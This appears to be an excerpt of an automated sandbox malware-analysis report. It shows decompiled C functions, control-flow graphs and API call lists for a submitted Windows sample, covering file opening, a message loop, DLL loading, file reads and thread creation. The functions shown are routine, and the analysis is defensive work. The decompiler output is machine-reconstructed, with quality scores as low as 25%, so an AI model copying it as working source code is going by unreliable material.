                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A1A5A6
                                                          • Part of subcall function 00A11AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00A0B250,?,?,?,00A0B1FE,?,-00000002,?,00000000,?), ref: 00A11ADA
                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A1A596
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                        • String ID: EDIT$pltv
                                                        • API String ID: 4243998846-1976670045
                                                        • Opcode ID: 2febea9482fddc1796e29deba8296c74ba1d59332ec5a8af012c73e9e8f34d9d
                                                        • Instruction ID: 7e094f49c59b0a507933bb1d11159a67b113dc9d9b7e4dc290a486c142f9c3ea
                                                        • Opcode Fuzzy Hash: 2febea9482fddc1796e29deba8296c74ba1d59332ec5a8af012c73e9e8f34d9d
                                                        • Instruction Fuzzy Hash: 33F08232A467286BE7209BA59C05FEB7A6D9F4AB50F050055FE04A6180D7A0AE42C6F6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09B50 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 986 a09b50-a09b71 call a1e630 989 a09b73-a09b76 986->989 990 a09b7c 986->990 989->990 991 a09b78-a09b7a 989->991 992 a09b7e-a09b9b 990->992 991->992 993 a09ba3-a09bad 992->993 994 a09b9d 992->994 995 a09bb2-a09bd1 call a07119 993->995 996 a09baf 993->996 994->993 999 a09bd3 995->999 1000 a09bd9-a09bf7 CreateFileW 995->1000 996->995 999->1000 1001 a09bf9-a09c1b GetLastError call a0b85c 1000->1001 1002 a09c5b-a09c60 1000->1002 1011 a09c4a-a09c4f 1001->1011 1012 a09c1d-a09c3f CreateFileW GetLastError 1001->1012 1003 a09c81-a09c95 1002->1003 1004 a09c62-a09c65 1002->1004 1007 a09cb3-a09cbe 1003->1007 1008 a09c97-a09caf call a10131 1003->1008 1004->1003 1006 a09c67-a09c7b SetFileTime 1004->1006 1006->1003 1008->1007 1011->1002 1013 a09c51 1011->1013 1015 a09c41 1012->1015 1016 a09c45-a09c48 1012->1016 1013->1002 1015->1016 1016->1002 1016->1011
                                                        C-Code - Quality: 95%
                                                        			E00A09B50(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t49;
				long _t60;
				unsigned int _t62;
				long _t65;
				signed int _t66;
				char _t69;
				void* _t73;
				void* _t75;
				long _t79;
				void* _t82;

				_t75 = __esi;
				E00A1E630();
				_t62 = _a4188;
				_t73 = __ecx;
				 *(__ecx + 0x1024) =  *(__ecx + 0x1024) & 0x00000000;
				if( *((char*)(__ecx + 0x22)) != 0 || (_t62 & 0x00000004) != 0) {
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_push(_t75);
				asm("sbb esi, esi");
				_t79 = ( ~(_t62 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t62 & 0x00000001) != 0) {
					_t79 = _t79 | 0x40000000;
				}
				_t65 =  !(_t62 >> 3) & 0x00000001;
				if(_t69 != 0) {
					_t65 = _t65 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t73 + 0x1b)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00A07119( &_a12);
				if( *((char*)(_t73 + 0x20)) != 0) {
					_t79 = _t79 | 0x00000100;
				}
				_t49 = CreateFileW(_a4184, _t79, _t65, 0, 3, _v0, 0); // executed
				_t82 = _t49;
				if(_t82 != 0xffffffff) {
					L17:
					if( *((char*)(_t73 + 0x20)) != 0 && _t82 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t82, 0,  &_a4, 0);
					}
					 *((char*)(_t73 + 0x18)) = 0;
					_t66 = _t65 & 0xffffff00 | _t82 != 0xffffffff;
					 *((intOrPtr*)(_t73 + 0xc)) = 0;
					 *((char*)(_t73 + 0x10)) = 0;
					if(_t82 != 0xffffffff) {
						 *(_t73 + 4) = _t82;
						E00A10131(_t73 + 0x24, _a4184, 0x800);
						 *((char*)(_t73 + 0x21)) = 0;
					}
					return _t66;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00A0B85C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t73 + 0x1024)) = 1;
						}
						goto L17;
					}
					_t82 = CreateFileW( &_a12, _t79, _t65, 0, 3, _v0, 0);
					_t60 = GetLastError();
					if(_t60 == 2) {
						_a4.dwLowDateTime = _t60;
					}
					if(_t82 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                                                        0x00a09b50
                                                        0x00a09b55
                                                        0x00a09b5b
                                                        0x00a09b64
                                                        0x00a09b66
                                                        0x00a09b71
                                                        0x00a09b7c
                                                        0x00a09b78
                                                        0x00a09b78
                                                        0x00a09b78
                                                        0x00a09b82
                                                        0x00a09b8a
                                                        0x00a09b92
                                                        0x00a09b9b
                                                        0x00a09b9d
                                                        0x00a09b9d
                                                        0x00a09ba8
                                                        0x00a09bad
                                                        0x00a09baf
                                                        0x00a09baf
                                                        0x00a09bc4
                                                        0x00a09bc8
                                                        0x00a09bd1
                                                        0x00a09bd3
                                                        0x00a09bd3
                                                        0x00a09bec
                                                        0x00a09bf2
                                                        0x00a09bf7
                                                        0x00a09c5b
                                                        0x00a09c60
                                                        0x00a09c67
                                                        0x00a09c70
                                                        0x00a09c7b
                                                        0x00a09c7b
                                                        0x00a09c86
                                                        0x00a09c89
                                                        0x00a09c8c
                                                        0x00a09c8f
                                                        0x00a09c95
                                                        0x00a09ca6
                                                        0x00a09caa
                                                        0x00a09caf
                                                        0x00a09caf
                                                        0x00a09cbe
                                                        0x00a09bf9
                                                        0x00a09bff
                                                        0x00a09c1b
                                                        0x00a09c4a
                                                        0x00a09c4f
                                                        0x00a09c51
                                                        0x00a09c51
                                                        0x00000000
                                                        0x00a09c4f
                                                        0x00a09c34
                                                        0x00a09c36
                                                        0x00a09c3f
                                                        0x00a09c41
                                                        0x00a09c41
                                                        0x00a09c48
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09c48

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00A0797C,?,00000005,?,00000011), ref: 00A09BEC
                                                        • GetLastError.KERNEL32(?,?,00A0797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09BF9
                                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00A0797C,?,00000005,?), ref: 00A09C2E
                                                        • GetLastError.KERNEL32(?,?,00A0797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09C36
                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A0797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09C7B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time
                                                        • String ID:
                                                        • API String ID: 1999340476-0
                                                        • Opcode ID: af920ed828f8446c97164f80c131594d900ed2627b34e437ebeae9f4cef6ac34
                                                        • Instruction ID: ff66a71b882d7fc4d6a0970a6a0432109ed31eee7777e6ca5cfbd874c144c0f2
                                                        • Opcode Fuzzy Hash: af920ed828f8446c97164f80c131594d900ed2627b34e437ebeae9f4cef6ac34
                                                        • Instruction Fuzzy Hash: 9241453194874A6FE720CF20ED05BDBBBE4BB06324F100719F9E5961D2D3B4A989CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1AF04 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1045 a1af04-a1af1d PeekMessageW 1046 a1af58-a1af5c 1045->1046 1047 a1af1f-a1af33 GetMessageW 1045->1047 1048 a1af35-a1af42 IsDialogMessageW 1047->1048 1049 a1af44-a1af52 TranslateMessage DispatchMessageW 1047->1049 1048->1046 1048->1049 1049->1046
                                                        C-Code - Quality: 100%
                                                        			E00A1AF04() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xa48458; // 0x1039a
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                                                        0x00a1af15
                                                        0x00a1af1d
                                                        0x00a1af26
                                                        0x00a1af2c
                                                        0x00a1af33
                                                        0x00a1af44
                                                        0x00a1af48
                                                        0x00a1af52
                                                        0x00000000
                                                        0x00a1af52
                                                        0x00a1af3a
                                                        0x00a1af42
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1af42
                                                        0x00a1af5c

                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AF15
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AF26
                                                        • IsDialogMessageW.USER32(0001039A,?), ref: 00A1AF3A
                                                        • TranslateMessage.USER32(?), ref: 00A1AF48
                                                        • DispatchMessageW.USER32(?), ref: 00A1AF52
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 1266772231-0
                                                        • Opcode ID: 68b2d745d053434a09fc779d0701c15d667ecb73796b2e2f3ddbb01ad2799567
                                                        • Instruction ID: fbaf34455f39e31f6cb25a6d4a10d2bf072559c787165db3b8b28ef8bc4cd466
                                                        • Opcode Fuzzy Hash: 68b2d745d053434a09fc779d0701c15d667ecb73796b2e2f3ddbb01ad2799567
                                                        • Instruction Fuzzy Hash: 27F03AB1D0262AAB8B20DBE2EC4CEEB7F7CEE052917404415F909D2140EB68D806CBF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A5C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 25%
                                                        			E00A1A5C6(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00A10360(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xa62180(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xa62034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00A1E506(); // executed
				 *0xa62088(0xa48430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                                                        0x00a1a5d5
                                                        0x00a1a5dc
                                                        0x00a1a5df
                                                        0x00a1a5e8
                                                        0x00a1a5f0
                                                        0x00a1a5f7
                                                        0x00a1a601
                                                        0x00a1a60c
                                                        0x00a1a610
                                                        0x00a1a613
                                                        0x00a1a616
                                                        0x00a1a620
                                                        0x00a1a62d

                                                        APIs
                                                          • Part of subcall function 00A10360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A1037B
                                                          • Part of subcall function 00A10360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EE61,Crypt32.dll,00000000,00A0EEE5,?,?,00A0EEC7,?,?,?), ref: 00A1039D
                                                        • OleInitialize.OLE32(00000000), ref: 00A1A5DF
                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A616
                                                        • SHGetMalloc.SHELL32(00A48430), ref: 00A1A620
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                        • String ID: riched20.dll
                                                        • API String ID: 3498096277-3360196438
                                                        • Opcode ID: f7112f1ce0a7616399e641107850c756bfb6ae3a583979ea9115e1b4786bf0fc
                                                        • Instruction ID: 5a562aab826a0a27c36adf10f7c9d4e603b4d4d483afff82cb023029ebca6c92
                                                        • Opcode Fuzzy Hash: f7112f1ce0a7616399e641107850c756bfb6ae3a583979ea9115e1b4786bf0fc
                                                        • Instruction Fuzzy Hash: DBF0FFB5D0010EABCB20EF99D9499EFFBFCEF95715F00415AF814E2200DBB856458BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A099EE Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1054 a099ee-a099fa 1055 a09a07-a09a1e ReadFile 1054->1055 1056 a099fc-a09a04 GetStdHandle 1054->1056 1057 a09a20-a09a29 call a09b29 1055->1057 1058 a09a7a 1055->1058 1056->1055 1062 a09a42-a09a46 1057->1062 1063 a09a2b-a09a33 1057->1063 1060 a09a7d-a09a82 1058->1060 1065 a09a57-a09a5b 1062->1065 1066 a09a48-a09a51 GetLastError 1062->1066 1063->1062 1064 a09a35 1063->1064 1067 a09a36-a09a40 call a099ee 1064->1067 1069 a09a75-a09a78 1065->1069 1070 a09a5d-a09a65 1065->1070 1066->1065 1068 a09a53-a09a55 1066->1068 1067->1060 1068->1060 1069->1060 1070->1069 1071 a09a67-a09a70 GetLastError 1070->1071 1071->1069 1073 a09a72-a09a73 1071->1073 1073->1067
                                                        C-Code - Quality: 59%
                                                        			E00A099EE(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00A09B29(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00A099EE(_t25);
						}
					}
				}
				return _t15;
			}







                                                        0x00a099f1
                                                        0x00a099f3
                                                        0x00a099fa
                                                        0x00a09a04
                                                        0x00a09a04
                                                        0x00a09a16
                                                        0x00a09a1e
                                                        0x00a09a7a
                                                        0x00a09a20
                                                        0x00a09a22
                                                        0x00a09a29
                                                        0x00a09a42
                                                        0x00a09a46
                                                        0x00a09a57
                                                        0x00a09a5b
                                                        0x00a09a75
                                                        0x00a09a75
                                                        0x00a09a67
                                                        0x00a09a67
                                                        0x00a09a70
                                                        0x00000000
                                                        0x00a09a72
                                                        0x00a09a72
                                                        0x00000000
                                                        0x00a09a72
                                                        0x00a09a70
                                                        0x00a09a48
                                                        0x00a09a48
                                                        0x00a09a51
                                                        0x00000000
                                                        0x00a09a53
                                                        0x00a09a53
                                                        0x00a09a53
                                                        0x00a09a51
                                                        0x00a09a2b
                                                        0x00a09a2b
                                                        0x00a09a33
                                                        0x00000000
                                                        0x00a09a35
                                                        0x00a09a35
                                                        0x00a09a36
                                                        0x00a09a36
                                                        0x00a09a3b
                                                        0x00a09a3b
                                                        0x00a09a33
                                                        0x00a09a29
                                                        0x00a09a82

                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A099FE
                                                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00A09A16
                                                        • GetLastError.KERNEL32 ref: 00A09A48
                                                        • GetLastError.KERNEL32 ref: 00A09A67
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        • Opcode ID: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                                        • Instruction ID: cc19a06f9bd1a75738ec2e16d2ef89ce060931e561888f5bd30b686406cd75c7
                                                        • Opcode Fuzzy Hash: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                                        • Instruction Fuzzy Hash: 77115E31B04108ABDF209B50ED46A6BBBA8EB417A1F108129F86A851D2D7359E429F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2A804 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00A2A804(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xa615e0 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xa36e90 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xcba178b5
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                                                        0x00a2a809
                                                        0x00a2a80d
                                                        0x00a2a814
                                                        0x00a2a818
                                                        0x00a2a826
                                                        0x00a2a836
                                                        0x00a2a83c
                                                        0x00a2a840
                                                        0x00a2a869
                                                        0x00a2a86b
                                                        0x00a2a86f
                                                        0x00a2a872
                                                        0x00a2a872
                                                        0x00a2a878
                                                        0x00a2a87a
                                                        0x00000000
                                                        0x00a2a87b
                                                        0x00a2a842
                                                        0x00a2a84b
                                                        0x00a2a85a
                                                        0x00a2a84d
                                                        0x00a2a850
                                                        0x00a2a856
                                                        0x00a2a856
                                                        0x00a2a85e
                                                        0x00000000
                                                        0x00a2a860
                                                        0x00a2a863
                                                        0x00a2a865
                                                        0x00000000
                                                        0x00a2a865
                                                        0x00a2a85e
                                                        0x00a2a81a
                                                        0x00a2a81f
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A23B5F,00000000,00000000,?,00A2A7AB,00A23B5F,00000000,00000000,00000000,?,00A2A9A8,00000006,FlsSetValue), ref: 00A2A836
                                                        • GetLastError.KERNEL32(?,00A2A7AB,00A23B5F,00000000,00000000,00000000,?,00A2A9A8,00000006,FlsSetValue,00A37348,00A37350,00000000,00000364,?,00A29387), ref: 00A2A842
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2A7AB,00A23B5F,00000000,00000000,00000000,?,00A2A9A8,00000006,FlsSetValue,00A37348,00A37350,00000000), ref: 00A2A850
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                                        • Instruction ID: ecdf7910a3e32b2dd3edbf95a2974b8e9a4624beac1e312b92da8bf3f6f2c2a0
                                                        • Opcode Fuzzy Hash: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                                        • Instruction Fuzzy Hash: F901FC36605232ABDB218BBDBC44A56BB98AF25BA17110634F90AD7140D731D90386D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10B64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E00A10B64() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xa40f50 > 0) {
					_t18 = 0xa40f54;
					do {
						_t7 = CreateThread(0, 0x10000, E00A10CA0, 0xa40f50, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xa40f50);
							E00A06E68(0xa40f50);
							E00A06E63(E00A07002(_t25), 0xa40f50, 0xa40f50, 2);
						}
						 *_t18 = _t22;
						 *0x00A41054 =  *((intOrPtr*)(0xa41054)) + 1;
						_t8 =  *0xa481d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xa40f50);
					return _t8;
				}
				return _t5;
			}













                                                        0x00a10b69
                                                        0x00a10b6d
                                                        0x00a10b71
                                                        0x00a10b74
                                                        0x00a10b88
                                                        0x00a10b8e
                                                        0x00a10b90
                                                        0x00a10b92
                                                        0x00a10b94
                                                        0x00a10b99
                                                        0x00a10b9e
                                                        0x00a10bb6
                                                        0x00a10bb6
                                                        0x00a10bbb
                                                        0x00a10bbd
                                                        0x00a10bc3
                                                        0x00a10bca
                                                        0x00a10bcf
                                                        0x00a10bcf
                                                        0x00a10bd5
                                                        0x00a10bd6
                                                        0x00a10bd9
                                                        0x00000000
                                                        0x00a10bde
                                                        0x00a10be2

                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00010CA0,?,00000000,00000000), ref: 00A10B88
                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00A10BCF
                                                          • Part of subcall function 00A06E68: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06E86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                        • String ID: CreateThread failed
                                                        • API String ID: 2655393344-3849766595
                                                        • Opcode ID: 78623955bb86b1e4d5cf1f4a8d629f98f2a0d50f66613d25b97f79b424e8df4c
                                                        • Instruction ID: eef41264b791c92b7243f7627ad3942be47866661eb4635b8899b6e27c6ba061
                                                        • Opcode Fuzzy Hash: 78623955bb86b1e4d5cf1f4a8d629f98f2a0d50f66613d25b97f79b424e8df4c
                                                        • Instruction Fuzzy Hash: F301F97634C3057FD6345F54FE85FA67398EB40715F20092DFA86A61C1CAF1A8C19760
